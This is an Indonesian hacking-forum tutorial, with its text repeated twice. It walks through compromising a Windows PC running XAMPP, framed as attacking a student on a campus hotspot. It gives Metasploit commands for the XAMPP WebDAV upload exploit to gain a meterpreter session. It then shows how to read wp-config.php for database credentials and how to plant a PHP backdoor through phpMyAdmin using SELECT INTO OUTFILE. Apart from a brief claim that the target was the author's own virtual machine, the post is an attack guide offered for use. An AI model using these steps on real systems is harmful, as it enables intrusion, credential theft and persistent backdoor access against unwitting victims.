09-05-2014, 09:12 PM
[hide]
selamat malam rekan-rekan IBTeam sekalian.
sebelumnya saya ingin mengucapkan turut berduka cita atas meninggalnya rekan kita Red Dragon dari HN forum semoga amal ibadahnya di terima oleh Tuhan yang maha kuasa. :')
pada kesempatan kali ini saya akan berbagi sedikit ilmu yang masih tingkat bawah. jadi jangan buli yaa... hehehee
kali ini, saya akan memberi tahu cara bagaimana kita bisa mengeksploitasi pc milik korban baik yang satu jaringan maupun yang berada di luar jaringan via ip publik tentunya.
jadi kali ini saya akan membahas tutorial singkat seperti dongeng. tapi itu hanya ilustrasi saja ya. saya tetap melakukan percobaan ini secara local. karena saya menjaga kode etik perentasan. hehehee
pada suatu hari, saya jalan jalan di area hotspot sebuah kampus jurusan IT. kita bisa menebak aktifitas yang mereka lakukan selama berada di kampus apa saja. ada yang sedang iseng" buka youtube, facebookan, nonton anime hingga yang sedang coding. wah coding nih, coding apaan dulu nih? wah kalau seorang web developer, tentunya dia pasti menggunakan xampp saat menggunakan windows. ok langsung saja kita serang pc milik salah satu mahasiswa yang ada di kampus ini.
target kita kali ini adalah Windows 7 ultimate 32 bit yang sudah terinstal xampp. bagaimana saya bisa tahu? nmap saja wkwkwkkwkw
dari sini kita bisa tahu bahwa korban menggunakan operating system windows dan mysql sedang running di dalamnya. pertanda baik jika kita bisa membuka ip korban di web browser.
wah ternyata bisa di buka wkwkwkwkk. tenang ini target kita kali ini adalah pc saya sendiri yang sedang di jalanin via virtual box wkwkwkwkwkk
ok langsung saja kita buka metasploit untuk mengeksekusinya.
setelah kita mendapatkan exploit yang kita butuhkan, kita bisa masukan opsi tersebut dengan cara
kita bisa memasukan ip korban dengan cara
setelah kita memasukan ip korban, kita langsung saja
dan hasilnya adalah kita sudah masuk ke meterpreter. tandanya kita sudah mendapatkan hak akses penuh dari pc korban.
tidak sampai disitu kali ini saya ingin sekali memasang shell backdoor ke pc korban untuk jaga jaga kalau mau usilin dia hehehee.
secara otomatis shell metasploit yang kita gunakan tersimpan di folder webdav. jadi kita mundur satu directory untuk mencari htdocs (folder setara /var/www jika di linux)
kita langsung masuk saja ke directory htdocs untuk beriseng ria heehehee
ahh nggak cukup iseng, kebetulan korban menggunakan wordpress jadi kita bisa tahu dengan mudah username password phpmyadmin milik korban di wp-config.php
kita bisa melihatnya dengan cara
akhirnya kita bisa tahu username password untuk phpmyadminnya yaitu username:root pass
ony hehehee
sekarang kita coba upload via meterpreter shell backdoor untuk jaga jaga aja
wahh ternyata nggak bisa di upload via meterpreter. ok dah kita coba upload via phpmyadmin aja yakk wkwkwkwkk
kita masuk dengan username dan password yang kita dapatkan dari wp-config tadi.
dan walaaahh akhirnya masuukk wkwkwkwkkwkwk
lalu kita pilih menu SQL dan isikan
untuk mengetahui source directory document_root korban anda bisa cari di ip_korban/xampp dan pilih phpinfo()
nah kalau sudah ketemu langsung saja kita isi sql tersebut dan klik go!
setelah klik go mungkin akan muncul tulisan seperti ini
tapi itu tidak apa apa. abaikan saja wkwkwkkw.
sekarang kita tinggal buka shell backdoor yang kita pasang barusan dengan cara:
sekian tutorial sederhana dari saya. mohon maaf apabila ada yang tidak berkenan.
semoga bermanfaat
[/hide]
selamat malam rekan-rekan IBTeam sekalian.
sebelumnya saya ingin mengucapkan turut berduka cita atas meninggalnya rekan kita Red Dragon dari HN forum semoga amal ibadahnya di terima oleh Tuhan yang maha kuasa. :')
pada kesempatan kali ini saya akan berbagi sedikit ilmu yang masih tingkat bawah. jadi jangan buli yaa... hehehee
kali ini, saya akan memberi tahu cara bagaimana kita bisa mengeksploitasi pc milik korban baik yang satu jaringan maupun yang berada di luar jaringan via ip publik tentunya.
jadi kali ini saya akan membahas tutorial singkat seperti dongeng. tapi itu hanya ilustrasi saja ya. saya tetap melakukan percobaan ini secara local. karena saya menjaga kode etik perentasan. hehehee
pada suatu hari, saya jalan jalan di area hotspot sebuah kampus jurusan IT. kita bisa menebak aktifitas yang mereka lakukan selama berada di kampus apa saja. ada yang sedang iseng" buka youtube, facebookan, nonton anime hingga yang sedang coding. wah coding nih, coding apaan dulu nih? wah kalau seorang web developer, tentunya dia pasti menggunakan xampp saat menggunakan windows. ok langsung saja kita serang pc milik salah satu mahasiswa yang ada di kampus ini.
target kita kali ini adalah Windows 7 ultimate 32 bit yang sudah terinstal xampp. bagaimana saya bisa tahu? nmap saja wkwkwkkwkw
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A48%3A15.png]](https://3.bp.blogspot.com/-k4DE0K_OYOU/VAmy-qfEjkI/AAAAAAAAAL4/-EzMjZWiXYg/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A48%3A15.png)
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A48%3A30.png]](https://4.bp.blogspot.com/-u8ydx6Ujo6w/VAmy9vAiHoI/AAAAAAAAAL0/vJLBn9o9N2M/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A48%3A30.png)
ok langsung saja kita buka metasploit untuk mengeksekusinya.
Quote:msfconsoledan langsung cari exploit untuk xampp dengan cara
Quote:search xampp
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A29.png]](https://4.bp.blogspot.com/-Ed_XiwondKU/VAmzDpCN9GI/AAAAAAAAAMQ/QojkMo0Y8L4/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A29.png)
setelah kita mendapatkan exploit yang kita butuhkan, kita bisa masukan opsi tersebut dengan cara
Quote:use exploit/windows/http/xampp_webdav_upload_phplalu kita check apa saja yang di butuhkan untuk melaksanakan exploitasi tersebut. eh ternyata cuman butuh ip korbannya doang wakakakkakakk
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A43.png]](https://1.bp.blogspot.com/-kegsV5kBj7I/VAmzuOB6I5I/AAAAAAAAANA/al89YbhMJZo/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A43.png)
kita bisa memasukan ip korban dengan cara
Quote:set RHOST ip_korban
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A57.png]](https://1.bp.blogspot.com/-KMW6clH8e24/VAmzsrd2myI/AAAAAAAAAM4/1lDoBtopZG4/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A57.png)
setelah kita memasukan ip korban, kita langsung saja
Quote:exploit
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A01.png]](https://3.bp.blogspot.com/-d2iBgpAQ8Tg/VAmzcD04IqI/AAAAAAAAAMY/5vAaQZfiE-I/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A01.png)
tidak sampai disitu kali ini saya ingin sekali memasang shell backdoor ke pc korban untuk jaga jaga kalau mau usilin dia hehehee.
secara otomatis shell metasploit yang kita gunakan tersimpan di folder webdav. jadi kita mundur satu directory untuk mencari htdocs (folder setara /var/www jika di linux)
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A12.png]](https://3.bp.blogspot.com/-H0-Xrrncgv0/VAmzhW-JguI/AAAAAAAAAMg/EH75FqZeQlA/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A12.png)
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A27.png]](https://4.bp.blogspot.com/-Gqt_kNNt3a0/VAmzlqL74aI/AAAAAAAAAMo/bE3RgwiTlUI/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A27.png)
ahh nggak cukup iseng, kebetulan korban menggunakan wordpress jadi kita bisa tahu dengan mudah username password phpmyadmin milik korban di wp-config.php
kita bisa melihatnya dengan cara
Quote:cat wp-config.php
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A52.png]](https://4.bp.blogspot.com/-rcx_4ZAuLyA/VAmzpEP4E6I/AAAAAAAAAMw/oeU-136KRkc/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A52.png)
ony heheheesekarang kita coba upload via meterpreter shell backdoor untuk jaga jaga aja
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A53%3A38.png]](https://4.bp.blogspot.com/-0uu1jgTJ2HI/VAmzvigrAaI/AAAAAAAAANI/nPDxL7ad9EM/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A53%3A38.png)
kita masuk dengan username dan password yang kita dapatkan dari wp-config tadi.
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A53%3A54.png]](https://2.bp.blogspot.com/-zL4VVQovpbQ/VAmzv0SDF0I/AAAAAAAAANQ/VS3j1Fxt36s/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A53%3A54.png)
dan walaaahh akhirnya masuukk wkwkwkwkkwkwk
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A54%3A02.png]](https://1.bp.blogspot.com/-PXjk4nlejVs/VAmzweHQEtI/AAAAAAAAANM/TTjbrRCmMbE/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A54%3A02.png)
lalu kita pilih menu SQL dan isikan
Quote:select "copas shell backdoor kamu disini" into outfile 'source document_root/namabackdoor.php'
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B17%3A05%3A20.png]](https://4.bp.blogspot.com/-eyxbBp-jfaY/VAmzxuutjlI/AAAAAAAAANY/JjjduMk4oWA/s1600/Screenshot%2Bfrom%2B2014-09-05%2B17%3A05%3A20.png)
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A49%3A03.png]](https://2.bp.blogspot.com/-BZMTpCnmSI4/VAmzAHwQ9oI/AAAAAAAAAMA/-8yaUNCF3PE/s1600/Screenshot%2Bfrom%2B2014-09-05%2B16%3A49%3A03.png)
nah kalau sudah ketemu langsung saja kita isi sql tersebut dan klik go!
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B17%3A05%3A59.png]](https://3.bp.blogspot.com/-EbR3N1DvFDU/VAmzy4X-9MI/AAAAAAAAANo/ahB8RSM3aFw/s1600/Screenshot%2Bfrom%2B2014-09-05%2B17%3A05%3A59.png)
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B17%3A06%3A06.png]](https://1.bp.blogspot.com/-zns51w0s3JA/VAmzzNP0dbI/AAAAAAAAANk/VxwSAdOjTjw/s1600/Screenshot%2Bfrom%2B2014-09-05%2B17%3A06%3A06.png)
sekarang kita tinggal buka shell backdoor yang kita pasang barusan dengan cara:
Quote:ip_korban/nama_shell_backdoor.phpdan akhirnya berhasil heheheheee
Spoiler! :
![[Image: Screenshot%2Bfrom%2B2014-09-05%2B17%3A06%3A22.png]](https://2.bp.blogspot.com/-lycyTgVNAZg/VAmzzUDlGNI/AAAAAAAAANs/_Rc1JR6DIHg/s1600/Screenshot%2Bfrom%2B2014-09-05%2B17%3A06%3A22.png)
sekian tutorial sederhana dari saya. mohon maaf apabila ada yang tidak berkenan.
semoga bermanfaat
[/hide]
